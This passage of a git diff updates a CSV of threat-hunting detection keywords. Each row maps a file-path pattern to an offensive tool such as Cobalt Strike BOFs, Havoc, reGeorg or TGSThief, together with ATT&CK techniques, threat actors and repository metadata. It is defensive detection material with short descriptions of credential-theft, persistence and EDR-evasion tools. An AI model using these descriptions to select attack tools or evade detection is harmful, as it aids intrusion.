- T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*/ReflectiveDll.c*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/ReflectiveDLLInjection/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
@@ -4972,61 +5022,62 @@ "*/ReflectiveNtdll.git*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*/RefleXXion.git*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*/reGeorg.git*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" -"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/RegistryPersistence.c*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/Registry-Recon/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","314","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" -"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update 
and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" -"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/reg-query.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/regreeper.jpg*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. 
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*/Reg-Restore-Persistence-Mole*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/regsvcs/meterpreter*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regsvr.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/regsvr32/shellcode_inject*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/releases/download/*/abc.exe*","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","129","18","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" -"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/office_tokens/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/ProcessDestroy/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/ProcessListHandles/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/schtaskscreate/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/schtasksrun/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/setuserpass/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/Remote/unexpireuser/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/remote-method-guesser.git*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and 
can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*/RemoteOps.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/releases/latest/download/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/Remote/adcs_request/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 